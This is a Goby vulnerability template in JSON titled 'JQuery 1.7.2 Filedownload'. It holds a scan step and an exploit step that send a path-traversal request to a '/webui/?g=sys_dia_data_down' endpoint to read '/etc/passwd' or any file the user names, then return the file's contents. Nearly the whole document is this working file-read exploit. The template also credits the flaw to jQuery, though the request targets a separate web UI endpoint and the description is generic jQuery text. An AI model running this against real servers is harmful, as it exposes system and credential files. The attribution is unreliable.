Goby/json/JQuery_1.7.2_Filedownload.json

99 lines
3.6 KiB
JSON

{
"Name": "JQuery 1.7.2 Filedownload",
"Level": "3",
"Tags": [
"filedownload"
],
"GobyQuery": "body=\"webui/js/jquerylib/jquery-1.7.2.min.js\"",
"Description": "jQuery is a fast, small, and feature-rich JavaScript library. It makes things like HTML document traversal and manipulation, event handling, animation, and Ajax much simpler with an easy-to-use API that works across a multitude of browsers.",
"Product": "JQuery 1.7.2",
"Homepage": "https://jquery.com/",
"Author": "",
"Impact": "JQuery 1.7.2 Filedownload",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "file",
"Type": "input",
"Value": "../etc/passwd"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/webui/?g=sys_dia_data_down&file_name=../../../../../../../etc/passwd",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/webui/?g=sys_dia_data_down&file_name={{{file}}}",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}